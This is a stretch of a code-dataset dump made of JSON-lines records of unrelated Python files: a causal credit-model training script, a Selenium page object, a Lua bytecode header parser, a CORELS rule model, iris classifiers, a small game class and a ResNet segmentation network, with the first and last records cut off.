default='./experiments/German_Credit_treat_{}_outcome_{}_neighb_{}/')\n # parser.add_argument('--log_root', type=str, default='./experiments/German_Credit_treat_{}_outcome_{}/')\n parser.add_argument('--name', type=str,\n default='twin_net_arch_{}_{}_uy_{}_uy_monot_{}_z_monot_{}_z_layer_{}_calib_units_{}_z_{}_lr_{}_loss_{}_German_{}_confounders_{}_existing_risk')\n\n\n # Dataset Hparams\n # parser.add_argument('--path_to_data', type=str, default='../Data/German Credit/german_data_treatment_{}_2_outcome_{}_neighb_{}_{}.csv')\n parser.add_argument('--path_to_data', type=str, default='../Data/German Credit/german_data_treatment_{}_outcome_{}_neighb_{}_{}.csv')\n # parser.add_argument('--path_to_data', type=str, default='../Data/German Credit/german_data_treatment_{}_outcome_{}_{}.csv')\n parser.add_argument('--load_dataset', type=bool, default=True)\n parser.add_argument('--save_dataset', type=bool, default=False)\n parser.add_argument('--save_path', type=str, default='../Data/German Credit/')\n parser.add_argument('--save_name', type=str, default='german_data_treatment_{}_outcome_{}_neighb_{}_{}.csv')\n # parser.add_argument('--save_name', type=str, default='german_data_treatment_{}_outcome_{}_{}.csv')\n parser.add_argument('--n_samples', type=int, default=1000)\n parser.add_argument('--neighb', type=int, default=50)\n parser.add_argument('--propensity_score', type=bool, default=True)\n # parser.add_argument('--treatment', type=str, default='Credit-History')\n parser.add_argument('--treatment', type=str, default='Existing-Account-Status')\n parser.add_argument('--outcome', type=str, default='Status')\n # parser.add_argument('--outcome', type=str, default='Y')\n\n\n # parser.add_argument('--confounders', default=['all'])\n # parser.add_argument('--confounders', default=[\"Existing-Account-Status\", \"Month-Duration\", \"Purpose\", \"Credit-Amount\",\n # \"Saving-Acount\", \"Present-Employment\", \"Instalment-Rate\", \"Sex\", \"Guarantors\", \"Job\", \"Num-People\",])\n\n # parser.add_argument('--confounders', default=['dig',\"Credit-History\"])\n\n\n # parser.add_argument('--confounders', default=[\"Existing-Account-Status\", \"Month-Duration\", \"Purpose\", \"Credit-Amount\",\n # \"Saving-Acount\", \"Present-Employment\", \"Instalment-Rate\",])\n # parser.add_argument('--confounders',\n # default=[\"Existing-Account-Status\", \"Month-Duration\", \"Purpose\", \"Credit-Amount\",\n # \"Saving-Acount\"])\n\n parser.add_argument('--confounders',\n default=[\"Credit-History\", \"Month-Duration\", \"Purpose\", \"Credit-Amount\",\n \"Saving-Acount\", \"Present-Employment\", \"Instalment-Rate\", \"Sex\", \"Guarantors\", \"Job\", \"Num-People\"])\n parser.add_argument('--multiple_confounders', default=True, help='split confounders')\n\n parser.add_argument('--u_distribution', default='normal')\n parser.add_argument('--oversample',type=bool, default=False)\n parser.add_argument('--undersample',type=bool, default=False)\n # Model Hparams\n # parser.add_argument('--architecture', default='twin')\n parser.add_argument('--architecture', default='azlink')\n # parser.add_argument('--architecture', default='multi_azlink')\n parser.add_argument('--cat_treat', default=False)\n # parser.add_argument('--cat_buckets', default=5)\n # parser.add_argument('--treat_monot', default=[(0,1),(0,3),(0,4),\n # (1,3),(1,4),\n # (2,0),(2,1),(2,3),(2,4),\n # (3,4)])\n parser.add_argument('--cat_buckets', default=4)\n parser.add_argument('--treat_monot', default=[(0,1),(0,2),(0,3),\n (1,3),(1,2),\n (2,3),\n ])\n\n parser.add_argument('--lattice_sizes', default=[4,4])\n parser.add_argument('--epochs', type=int, default=2000)\n parser.add_argument('--batch_size', type=int, default=32)\n parser.add_argument('--lattice_units', type=int, default=1)\n parser.add_argument('--treat_calib_units', type=int, default=4)\n parser.add_argument('--uy_hidden_dims', type=int, default=4)\n parser.add_argument('--z_calib_units', type=int, default=4)\n parser.add_argument('--layer', default='linear')\n parser.add_argument('--uy_layer', default='none')\n parser.add_argument('--z_layer', default='none')\n parser.add_argument('--treat_monotonicity', default='increasing')\n parser.add_argument('--uy_monotonicity', default='none')\n parser.add_argument('--z_monotonicity', default='none')\n parser.add_argument('--z_monotonicity_latice', default='same', help='4 or same')\n parser.add_argument('--concats', type=bool,default=True)\n\n parser.add_argument('--z_monot_opt', type=int, default=2)\n parser.add_argument('--end_activation', default='none')\n parser.add_argument('--loss', default='mse')\n parser.add_argument('--lr_schedule', default=False)\n parser.add_argument('--lr', type=float, default=1e-3)\n\n\n parser.add_argument('--weighted_loss',default=False)\n parser.add_argument('--weight_1',type=float,default=0.75)\n parser.add_argument('--weight_2',type=float,default=1.75)\n\n # General\n parser.add_argument('--seed', type=int, default=42, metavar='S', help='random seed')\n parser.add_argument('--gpu', type=str, default='0')\n parser.add_argument('--workers', type=int, default=0)\n args = parser.parse_args()\n\n # GPU setup\n os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID' # see issue #152\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu\n\n if 'Y' in args.outcome:\n\n args.log_root = args.log_root.format(args.treatment.replace('-', '_'), args.outcome,)\n args.path_to_data = args.path_to_data.format(args.treatment.replace('-', '_'), args.outcome, '{}')\n\n else:\n args.log_root = args.log_root.format(args.treatment.replace('-', '_'), args.outcome, args.neighb,)\n args.path_to_data = args.path_to_data.format(args.treatment.replace('-', '_'), args.outcome, args.neighb, '{}')\n\n # Set Randomness\n if args.seed == 0: args.seed = int(np.random.randint(0, 2 ** 32 - 1, (1,)))\n print('seed', args.seed)\n np.random.seed(args.seed)\n tf.random.set_seed(args.seed)\n\n # Set logdirs\n\n\n\n lr_log = str(args.lr).replace('.', '_')\n lr_log = '{}_scheduled'.format(lr_log) if args.lr_schedule else lr_log\n\n confounders = '_'.join(args.confounders)\n multiple = 'multiple' if args.multiple_confounders else 'single'\n z_layer = '{}_{}'.format(multiple, args.z_layer)\n\n if args.multiple_confounders:\n\n z_monotonicity = 'opt_{}'.format(args.z_monot_opt)\n if args.z_monot_opt == 1:\n args.z_monotonicity_base = 0\n else:\n args.z_monotonicity_base = 1\n\n else:\n z_monotonicity = args.z_monotonicity\n args.z_calib_units = len(args.confounders) if 'all' not in args.confounders else 19\n\n if args.oversample:\n oversample = '_oversampled'\n elif args.undersample:\n oversample = '_undersampled'\n else:\n oversample = ''\n if args.weighted_loss:\n loss = '{}_weighted_{}_{}'.format(args.loss,args.weight_1,args.weight_2)\n else:\n loss = args.loss\n conf_to_print = '{}_confs'.format(len(args.confounders)) if 'all' not in args.confounders else 'all'\n calib_units = '{}_{}'.format(args.treat_calib_units,args.uy_hidden_dims)\n if not args.concats :\n conc = ''\n else:\n conc = '_concat'\n if args.cat_treat:\n cat_calib = '_categoric_treat_calib'\n else:\n cat_calib = ''\n layer = '{}_{}{}{}_treat_monot_{}'.format(args.architecture,args.layer,conc,cat_calib,args.treat_monotonicity)\n\n\n\n args.name = args.name.format(layer, args.end_activation, args.uy_layer, args.uy_monotonicity, z_monotonicity,\n z_layer,\n calib_units, args.z_calib_units, lr_log, loss, oversample,\n conf_to_print)\n\n if args.train:\n if not os.path.exists(args.log_root):\n os.makedirs(args.log_root)\n if args.restore:\n oldrunId = args.name\n oldrunpath = os.path.join(args.log_root, oldrunId)\n runId = args.name + '_cont'\n args.runPath = os.path.join(args.log_root, args.name)\n if not os.path.exists(args.runPath):\n os.makedirs(args.runPath)\n elif args.inference_name is not None:\n args.runPath = os.path.join(args.log_root, args.inference_name)\n else:\n args.runPath = os.path.join(args.log_root, args.name)\n\n run_train(args)\n\n\n","sub_path":"credit_ordering/train_twin.py","file_name":"train_twin.py","file_ext":"py","file_size_in_byte":21336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"35164197","text":"# -*- coding: utf-8 -*-\nfrom core.base_page import BasePage\nimport logging, sys, time\nimport pytest\n# logging.basicConfig(level=logging.INFO, stream=sys.stdout)\n# log = logging.getLogger()\nclass AirportBrief(BasePage):\n def __init__(self, driver):\n \"\"\"\n :type browser: selenium.webdriver.*\n \"\"\"\n self.driver = driver\n self.logger = logging.getLogger(self.__class__.__name__)\n self.timeout = 10\n\n self._station_txt = \"//input[@id='station']\"\n self._briefradius_chk = \"//select[@name='briefRadius']\"\n self._selectAllWeatherReports_chk = \"//input[@id='selectAllWeatherReports']\"\n self._taf_chk = \"//input[@value='TAF.DAT label.taf']\"\n self._ramtaf_chk = \"//input[@value='RAMTAF.DAT label.ramtaf']\"\n self._metar_chk = \"//input[@value='SAO.DAT label.metar']\"\n self._notams_chk = \"//input[@value='NTM-I.DAT label.notams']\"\n self._airep_chk = \"//input[@value='ARP.DAT label.airep']\"\n self._local_forecasts_chk = \"//input[@value='FORECAST.DAT label.local_forecasts']\"\n self._us_notams_chk = \"//input[@value='NTM.DAT label.us_notams']\"\n self._us_pireps_chk = \"//input[@value='PRP.DAT label.us_pireps']\"\n self._us_airmet_chk = \"//input[@value='WAM.DAT label.us_airmet']\"\n self._us_sigmet_chk = \"//input[@value='WSG.DAT label.us_sigmet']\"\n self._us_conv_sigmet_chk = \"//input[@value='WST.DAT label.us_conv_sigmet']\"\n self._us_low_winds_chk = \"//input[@value='FDLOW.DAT label.us_low_winds']\"\n self._us_high_winds_chk = \"//input[@value='FDHIGH.DAT label.us_high_winds']\"\n self._nws_watches_and_warnings_chk = \"//input[@value='NWSWW.DAT label.nws_watches_and_warnings']\"\n self._nws_weather_advisories_chk = \"//input[@value='NWSADV.DAT label.nws_weather_advisories']\"\n self._temperaturedewpoint_chk = \"//input[@value='TemperatureDewPoint Temperature & Dew Point']\"\n self._visibility_chk = \"//input[@value='Visibility Visibility']\"\n self._ceiling_chk = \"//input[@value='CeilingHeight Ceiling Height']\"\n self._clear_all_button_chk = \"//input[@value='Clear All']\"\n self._getairportbrief_chk = \"//input[@id='getAirportBrief']\"\n self._reportorder_radio = \"//input[@name='reportOrder']\"\n self._metarreports_txt = \"//input[@name='metarReports']\"\n self._decodedreports_chk = \"//input[@name='decodedReports']\"\n\n def navigate_to_airport_brief(driver):\n driver.logger.info('Navigate to Airport Brief tab')\n if not 'i18n_button_currenttab_td_middle' in driver.get_attribute(\"//SPAN[text()='Home']/..\",\n \"class\"):\n driver.click(\"//SPAN[text()='Home']\")\n if driver.get_attribute(\"//a[contains(@href,'/common/link.do?contentId=201782')]\", \"class\") in '':\n driver.click(\"//a[contains(@href,'/common/link.do?contentId=201782')]\")\n for i in range(10):\n if driver.is_element_present(\"//input[@id='getAirportBrief']\"):\n return True\n else:\n time.sleep(2)\n","sub_path":"pages/airport_brief_page.py","file_name":"airport_brief_page.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"404434579","text":"class BinaryChunkHeader:\n LUA_SIGNATURE = bytes(b'\\x1bLua')\n LUAC_VERSION = 0x53\n LUAC_FORMAT = 0x0\n LUAC_DATA = bytes(b'\\x19\\x93\\r\\n\\x1a\\n')\n CINT_SIZE = 4\n CSIZET_SIZE = 8\n INST_SIZE = 4\n LUA_INT_SIZE = 8\n LUA_NUMBER_SIZE = 8\n LUAC_INT = 0x5678\n LUAC_NUM = 370.5\n\n def __init__(self, br):\n self.signature = br.read_bytes(4)\n self.version = br.read_uint8()\n self.format = br.read_uint8()\n self.luac_data = br.read_bytes(6)\n self.cint_size = br.read_uint8()\n self.csizet_size = br.read_uint8()\n self.inst_size = br.read_uint8()\n self.lua_int_size = br.read_uint8()\n self.lua_number_size = br.read_uint8()\n self.luac_int = br.read_uint64()\n self.luac_num = br.read_double()\n\n def check(self):\n assert(self.signature == BinaryChunkHeader.LUA_SIGNATURE)\n assert(self.version == BinaryChunkHeader.LUAC_VERSION)\n assert(self.format == BinaryChunkHeader.LUAC_FORMAT)\n assert(self.luac_data == BinaryChunkHeader.LUAC_DATA)\n assert(self.cint_size == BinaryChunkHeader.CINT_SIZE)\n assert(self.csizet_size == BinaryChunkHeader.CSIZET_SIZE)\n assert(self.inst_size == BinaryChunkHeader.INST_SIZE)\n assert(self.lua_int_size == BinaryChunkHeader.LUA_INT_SIZE)\n assert(self.lua_number_size == BinaryChunkHeader.LUA_NUMBER_SIZE)\n assert(self.luac_int == BinaryChunkHeader.LUAC_INT)\n assert(self.luac_num == BinaryChunkHeader.LUAC_NUM)\n\n def dump(self):\n print('signature: ', self.signature)\n print('version: ', self.version)\n print('format: ', self.format)\n print('luac_data: ', self.luac_data)\n print('cint_size: ', self.cint_size)\n print('csizet_size: ', self.csizet_size)\n print('inst_size: ', self.inst_size)\n print('lua_int_size: ', self.lua_int_size)\n print('lua_number_size: ', self.lua_number_size)\n print('luac_int: ', hex(self.luac_int))\n print('luac_num: ', self.luac_num)\n print()\n","sub_path":"code/python/ch08/src/binary_chunk_header.py","file_name":"binary_chunk_header.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"283297203","text":"\"\"\"Manually specified (i.e. not learned) models.\"\"\"\nimport numpy as np\nimport pandas as pd\n\nfrom ethicml.common import implements\nfrom ethicml.utility import DataTuple, Prediction, TestTuple\n\nfrom .in_algorithm import InAlgorithm\n\n__all__ = [\"Corels\"]\n\n\nclass Corels(InAlgorithm):\n \"\"\"CORELS (Certifiably Optimal RulE ListS) algorithm for the COMPAS dataset.\n\n This algorithm uses if-statements to make predictions. It only works on COMPAS with s as sex.\n\n From this paper: https://arxiv.org/abs/1704.01701\n \"\"\"\n\n def __init__(self) -> None:\n \"\"\"Constructor of the class.\"\"\"\n super().__init__(name=\"CORELS\")\n\n @implements(InAlgorithm)\n def run(self, _: DataTuple, test: TestTuple) -> Prediction:\n if test.name is None or \"Compas\" not in test.name or \"sex\" not in test.s.columns:\n raise RuntimeError(\"The Corels algorithm only works on the COMPAS dataset\")\n age = test.x[\"age-num\"].to_numpy()\n priors = test.x[\"priors-count\"].to_numpy()\n sex = test.s[\"sex\"].to_numpy()\n male = 1\n condition1 = (age >= 18) & (age <= 20) & (sex == male)\n condition2 = (age >= 21) & (age <= 23) & (priors >= 2) & (priors <= 3)\n condition3 = priors > 3\n pred = np.where(condition1 | condition2 | condition3, np.ones_like(age), np.zeros_like(age))\n return Prediction(hard=pd.Series(pred))\n","sub_path":"ethicml/algorithms/inprocess/manual.py","file_name":"manual.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"304405080","text":"#!/usr/bin/env python\n\nimport numpy as np\nfrom seb.plot import Plot, Drawing, Plot3D, Container, Animation\n\nif __name__ == '__main__':\n x = np.linspace(-7, 7, 50)\n fn = lambda x, y: -np.sin(x/2.0) + y**2\n\n # Setup 3D Plot\n p = Plot3D('3D Rotation')\n p.projection(x, np.cos(x + 0.5), fn)\n p.set_axis('x axis', 'y axis', 'z axis')\n p.set_camera(45, 66)\n\n # 3D Rotation\n a3d = Animation()\n a3d.rotate_3d(p)\n a3d.save('./rot3d.gif')\n # a3d.save('./rot3d.mp4')\n\n # Setup Scatter Graph\n x = np.linspace(-7, 7, 30)\n q = Plot('Scatter (PuBuGn_d)', 500, 500, 100)\n q.canvas.axis('off')\n\n # Scatter animation\n def fn(d):\n q.scatter(d, np.cos(0.7+ d))\n return q\n a = Animation()\n a.anim_fn(fn, x)\n a.save('scatter.gif')\n # a.save('test.mp4')\n\n","sub_path":"scripts/seb/tests/animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"400336397","text":"\"\"\" Compiled: 2020-09-18 10:38:51 \"\"\"\n\n#__src_file__ = \"extensions/expiration/etc/FExerciseAssign.py\"\n#----------------------------------------------------------------------------\n# (c) Copyright 2020 SunGard Front Arena. All rights reserved.\n#----------------------------------------------------------------------------\n\"\"\"----------------------------------------------------------------------------\nMODULE\n FExerciseAssign - Script for exercising or assigning positions in options\n and warrants that are not handled manually or from an exchange\n\nDESCRIPTION\n This module exercises or assigns positions in options and warrants that\n are not automatically handled from an exchange or manually exercised, such\n as OTC instruments, instruments from other markets than EUREX, or American\n type derivatives.\n\n A. Cash settled instruments\n If the derivative is in-the-money and Cash settled, the derivative is\n closed at the intrinsic value, i.e. at\n price = settlement price - strike price.\n The premium is set accordingly.\n\n B. Physically settled instruments\n If the derivative is in-the-money and Physically settled, trades in both\n the underlying security and the derivative are entered. There are 2 modes\n to choose between (this is chosen in the variable window):\n\n 1. Market mode:\n The trade in the underlying security is done to the market price (the\n settlement price). The closing derivative trade carries the difference\n between the strike price and the settlement price, i.e.\n price = settlement price - strike price.\n\n 2. Strike mode:\n The trade in the underlying security is done at the strike price. The\n closing derivative trade gets the price and premium zero.\n\n Trade status is set to Exercise for long positions and Assign for short.\n\n NOTE! Abandon is performed in this script if the derivative is\n out-of-the-money. In this case the trade is made at price and premium 0,\n and the trade status is set to Abandon.\n\n NOTE! This script is not intended to run as a batch job.\n\nENDDESCRIPTION\n----------------------------------------------------------------------------\"\"\"\n\n#Import Front modules\nimport acm\nimport FBDPGui\nimport importlib\nimportlib.reload(FBDPGui)\nimport FBDPCustomPairDlg\n\n\n# Tool Tip\nttDoExeAss = ('Generate exercise and assignment transactions to close '\n 'in-the-money positions')\nttDoAbandon = ('Generate abandon transactions to close out-of-the-money '\n 'positions')\nttsettle_price = ('If defined, this price will be used instead of the '\n 'underlying\\'s settlement-price per expiration date. Should be '\n 'expressed in the quote type of the underlying.')\ntttrades = 'Select the positions that should be handled by the script'\nttsettlemarket = ('The underlying\\'s settlement price will primarily be '\n 'taken from this Market')\nttmode = ('Defines at what price the derivative position should be closed, '\n 'and the corresponding underlying trade opened')\nttInstrument = ('Specify the instruments that will be processed.')\nttCloseAll = ('Close all the positions if checked.')\nttExerciseIfATM = (\"Exercise if the option is 'At The Money'\")\nttPartialExercise = ('Specify the percentage of partial exercise')\n\nvalid_modes = ['Market', 'Strike']\n\n# Fill in smart default values\nsmarkets = map(lambda x: x.Name(), acm.FMTMMarket.Select(''))\n\n\nq = FBDPGui.insertTrades(expiryEnd='0d', expiryStart='1900-01-01')\n\ndef customDealPkgDialog(shell, params):\n customDlg = \\\n FBDPCustomPairDlg.SelectDealPackagesCustomDialog(shell, params)\n return acm.UX().Dialogs().ShowCustomDialogModal(shell,\n customDlg.CreateLayout(), customDlg)\n\ndefaultMode = 'Strike'\ntry:\n import FBDPHook\n importlib.reload(FBDPHook)\n defaultMode = FBDPHook.exercise_mode(1) and 'Strike' or 'Market'\nexcept:\n pass\n\n\nclass FPositionsAndInstrumentsVariables(FBDPGui.FxPositionVariables):\n\n def __init__(self, *ael_variables):\n\n ttInstrument = ('Specify the instruments that will be processed.')\n ttDealPackage = ('Specify the deal package oid that will be' \\\n 'processed.')\n\n # [VariableName,\n # DisplayName,\n # Type, CandidateValues, Default,\n # Mandatory, Multiple, Description, InputHook, Enabled]\n self.createVariable(\n ['trades',\n 'Positions_Positions',\n 'FTrade', None, q,\n 0, 1, tttrades, None, 0])\n self.createVariable(\n ['instruments',\n 'Instrument_Positions',\n 'FInstrument', None, None,\n 0, 1, ttInstrument, self.object_cb])\n self.createVariable(\n ['dealpackage',\n 'Deal Package_Positions',\n 'string', \"\", \"\",\n 0, 1, ttDealPackage, self.object_cb, 1,\n customDealPkgDialog])\n\n FBDPGui.FxPositionVariables.__init__(self, *ael_variables)\n\n def object_cb(self, index, fieldValues):\n tt = 'You can only select one type of object.'\n for field in (self.TradeQuery, self.TradeFilter,\n self.TradingPortfolios, self.instruments, self.dealpackage):\n if self[index] != field:\n field.enable(not fieldValues[index], tt)\n\n if (self.instruments.isEnabled() and\n fieldValues[self.instruments.sequenceNumber]\n or self.TradingPortfolios.isEnabled()\n and fieldValues[self.TradingPortfolios.sequenceNumber]):\n self.instruments.enable(1, tt)\n self.TradingPortfolios.enable(1, tt)\n self.TradeQuery.enable(0, tt)\n self.TradeFilter.enable(0, tt)\n self.dealpackage.enable(0, tt)\n elif (self.dealpackage.isEnabled() and\n fieldValues[self.dealpackage.sequenceNumber]):\n self.instruments.enable(0, tt)\n self.TradingPortfolios.enable(0, tt)\n self.TradeQuery.enable(0, tt)\n self.TradeFilter.enable(0, tt)\n\n return fieldValues\n\n\nael_variables = FPositionsAndInstrumentsVariables(\n # [VariableName,\n # DisplayName,\n # Type, CandidateValues, Default,\n # Mandatory, Multiple, Description, InputHook, Enabled]\n ['DoExeAss',\n 'Do Exercise Assign',\n 'int', ['1', '0'], 1,\n 1, 0, ttDoExeAss],\n ['DoAbandon',\n 'Do Abandon',\n 'int', ['1', '0'], 1,\n 1, 0, ttDoAbandon],\n ['close_all',\n 'Close All Positions',\n 'int', ['1', '0'], 1,\n 1, 0, ttCloseAll],\n ['exercise_if_ATM',\n 'Exercise if ATM',\n 'int', ['1', '0'], 0,\n 0, 0, ttExerciseIfATM],\n ['partial_exercise',\n 'Partially Exercise',\n 'string', None, '100',\n 0, 0, ttPartialExercise],\n ['settle_price',\n 'Settle Price',\n 'string', '', '',\n 0, None, ttsettle_price],\n ['settlemarket',\n 'Name of Settlement Market',\n 'string', smarkets, FBDPGui.getMtMMarket(),\n 2, None, ttsettlemarket],\n ['mode',\n 'Mode',\n 'string', valid_modes, defaultMode,\n 2, None, ttmode])\n\n\ndef ael_main(dictionary):\n\n import FBDPString\n importlib.reload(FBDPString)\n ScriptName = \"Exercise Assign\"\n import FBDPCurrentContext\n FBDPCurrentContext.CreateLog(ScriptName,\n dictionary['Logmode'],\n dictionary['LogToConsole'],\n dictionary['LogToFile'],\n dictionary['Logfile'],\n dictionary['SendReportByMail'],\n dictionary['MailList'],\n dictionary['ReportMessageType'])\n\n import FBDPCommon\n importlib.reload(FBDPCommon)\n import FBDPRollback\n importlib.reload(FBDPRollback)\n import FBDPCalculatePosition\n importlib.reload(FBDPCalculatePosition)\n import FBDPInstrument\n importlib.reload(FBDPInstrument)\n import FExeAssPerform\n importlib.reload(FExeAssPerform)\n\n dictionary['trades'] = FBDPCommon.convertEntityList(dictionary['trades'],\n dictionary)\n dictionary['Positions'] = dictionary['trades']\n\n FBDPGui.setPortfolioGrouper(dictionary)\n FBDPCommon.execute_script(FExeAssPerform.perform_exercise_assign,\n dictionary)\n","sub_path":"Extensions/Default/FPythonCode/FExerciseAssign.py","file_name":"FExerciseAssign.py","file_ext":"py","file_size_in_byte":8681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"249369689","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nfrom IPython.core.display import Image, display\ndisplay(Image(r'c:\\users\\avinash.t\\iris_setosa.jpg'))\nprint('iris_setosa\\n')\ndisplay(Image(r'c:\\users\\avinash.t\\Iris_versicolor.jpg'))\nprint('iris_versicolor\\n')\ndisplay(Image(r'c:\\users\\avinash.t\\Iris_virginica.jpg'))\nprint('iris_virginica\\n')\n\n\n# In[2]:\n\n\nfrom sklearn.datasets import load_iris\niris = load_iris()\niris.keys()\n\n\n# In[3]:\n\n\niris.data.shape\n\n\n# In[4]:\n\n\niris.feature_names\n\n\n# In[5]:\n\n\niris.target_names\n\n\n# In[6]:\n\n\niris.target\n\n\n# In[7]:\n\n\n##Logisitic Regression\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import metrics\nmodel = LogisticRegression()\nmodel.fit(iris.data,iris.target)\n#excepted out come\nexcpetedOutCome = iris.target\npredictedValue = model.predict(iris.data)\n\n\n# In[8]:\n\n\nprint(metrics.classification_report(excpetedOutCome, predictedValue))\n\n\n# In[9]:\n\n\nprint(metrics.confusion_matrix(excpetedOutCome, predictedValue))\n\n\n# In[14]:\n\n\n#navie Base Algoirthim\nfrom sklearn.naive_bayes import GaussianNB\nmodel = GaussianNB()\nmodel.fit(iris.data,iris.target)\nexcpeted = iris.target\npredicted = model.predict(iris.data)\nprint(metrics.confusion_matrix(excpeted, predicted))\nprint(metrics.accuracy_score(excpeted,predicted))\n\n","sub_path":"machineLearining/2_Irish_Flower_Machine_Learning/Visual_Iris_navie_Base.py","file_name":"Visual_Iris_navie_Base.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"403391815","text":"import random\nfrom hw8_1720387.Person import Person\nclass Hero(Person):\n def __init__(self,name='hero', level=1, maxhp=100, race='human'):#设置英雄初始化\n super().__init__(name,level,maxhp)\n # 定义种族,和灵活度\n self._race = race\n if self._race == 'human':#人类\n self._flex = 0.4\n elif self._race == 'elves':#精灵\n self._flex = 0.8\n\n def get_race(self): # 获取种族\n return self._race\n\n def get_flex(self): # 获取灵活度\n return self._flex\n\n def defence(self, hurt):\n #根据灵活性,可以躲避掉对方的攻击。\n luck = random.random()\n if luck >= self.get_flex():\n self.set_hp(hurt)\n print('伤害提示:英雄:{},受到{}点伤害!'.format(self.get_name(),hurt))\n else:\n print('您成功躲避攻击!')\n\n def attack(self,monster):\n #根据当前的等级,在一个给定范围内产生一个随机数作为攻击点数\n #monster被攻击对象\n if self.get_level() == 1:\n heroHurt = random.randint(0,10)\n elif self.get_level() ==2:\n heroHurt = random.randint(0, 20)\n elif self.get_level() ==3:\n heroHurt = random.randint(0, 30)\n monster.defence(heroHurt)#英雄伤害\n\n def upLevel(self):\n #升级,最大生命加点,回复生命\n self.set_level(1)#升一级\n self.set_maxhp(10)#注意最大生命必须先于回复生命\n self.reply_hp()\n print('升级提示:英雄:{},成功升级到{}级!'.format(self.get_name(),self.get_level()))\n\n","sub_path":"homework8/Group7/hw8_1720387/Hero.py","file_name":"Hero.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"562145937","text":"# TODO verify the model\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport sys\nfrom utils.loss import *\nfrom utils.metrics import *\nfrom tensorflow.contrib.layers.python.layers import utils\nfrom tensorflow.contrib.layers.python.layers import initializers\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\ndef update_argparser(parser):\n parser.set_defaults(\n train_steps=50000,\n learning_rate=((10000, 40000), (0.001, 0.0001,0.00001)),\n save_checkpoints_steps=1000,\n )\n\n'''\ndef update_argparser(parser):\n parser.set_defaults(\n train_steps=40000,\n learning_rate=((20000,30000), (0.0001, 0.00001,0.000001)),\n save_checkpoints_steps=1000,\n )\n'''\n\nclass ResNet_segmentation(object):\n \"\"\"\n Original ResNet-101 ('resnet_v1_101.ckpt')\n \"\"\"\n def __init__(self, inputs, args, phase, output_stride, encoder_name):\n if encoder_name not in ['res101', 'res50']:\n print('encoder_name ERROR!')\n print(\"Please input: res101, res50\")\n sys.exit(-1)\n self.encoder_name = encoder_name\n self.inputs = inputs\n self.num_classes = args.num_classes\n self.phase = phase # train (True) or test (False), for BN layers in the decoder\n self.multi_grid = args.multi_grid\n self.output_stride = output_stride\n # The current_stride variable keeps track of the effective stride of the\n # activations. This allows us to invoke atrous convolution whenever applying\n # the next residual unit would result in the activations having stride larger\n # than the target output_stride.\n self.current_stride = 1\n self.rate = 1 # The atrous convolution rate parameter.\n self.build_network()\n \n def build_network(self):\n self.encoding = self.build_encoder()\n self.outputs = self.build_decoder(self.encoding)\n \n def build_encoder(self, outputs_collections = None):\n scope_name = 'resnet_v1_101' if self.encoder_name == 'res101' else 'resnet_v1_50'\n with tf.variable_scope(scope_name):\n if self.output_stride is not None:\n if self.output_stride % 4 != 0:\n raise ValueError('The output_stride needs to be a multiple of 4.')\n self.output_stride /= 4\n\n net = self._start_block()\n net = tf.layers.max_pooling2d(net, pool_size = 3, strides=2, padding='same', name='pool1')\n\n # block 1\n with tf.variable_scope('block1'):\t\n for i in range(1, 3):\n with tf.variable_scope('unit_%d' % i):\n net = self._bottleneck_resblock(net, 256, 64, stride=1, unit_rate=1)\n with tf.variable_scope('unit_3'):\n net = self._bottleneck_resblock(net, 256, 64, stride=2, unit_rate=1)\n\n # block 2\n with tf.variable_scope('block2', values=[net]):\n for i in range(1, 4):\n with tf.variable_scope('unit_%d' % i, values=[net]):\n net = self._bottleneck_resblock(net, 512, 128, stride=1, unit_rate=1)\n with tf.variable_scope('unit_4', values=[net]):\n net = self._bottleneck_resblock(net, 512, 128, stride=2, unit_rate=1)\n \n '''\n # block 3, has nonlocal block\n with tf.variable_scope('block3', values=[net]):\n for i in range(1, 23):\n with tf.variable_scope('unit_%d' % i, values=[net]):\n net = self._bottleneck_resblock(net, 1024, 256, stride=1, unit_rate=1)\n with tf.variable_scope('unit_23', values=[net]):\n net = self._bottleneck_resblock(net, 1024, 256, stride=2, unit_rate=1)\n '''\n #block 3, has nonlocal block\n net = self._res_stage_nonlocal(net, 1024, stride = 2, block_id=3, num_blocks = 23, nonlocal_mod = 7, apply_nonlocal = True)\n\n # block 4\n with tf.variable_scope('block4'):\n for i in range(1, 4):\n with tf.variable_scope('unit_%d' % i):\n net = self._bottleneck_resblock(net, 2048, 512, stride=1, unit_rate = self.multi_grid[i-1])\n \n if self.output_stride is not None and self.current_stride != self.output_stride:\n raise ValueError('The target output_stride cannot be reached.')\n return net\n \n def build_decoder(self, encoding):\n with tf.variable_scope('decoder'):\n net = self._ASPP(encoding, \"ASPP_layer\", depth=256)\n net = self._conv2d(net, self.num_classes, 1, activation_fn=None, use_batch_norm=False, name='logits')\n\n size = tf.shape(self.inputs)[1:3]\n # resize the output logits to match the labels dimensions\n outputs = tf.image.resize_bilinear(net, size)\n return outputs\n\n\t# blocks\n def _start_block(self):\n \"\"\"Gets root_block_fn for beta variant.\n ResNet-v1 beta variant modifies the first original 7x7 convolution to three\n 3x3 convolutions.\n Args:\n net: A tensor of size [batch, height, width, channels], input to the model.\n Returns:\n A tensor after three 3x3 convolutions.\n \"\"\"\n net = 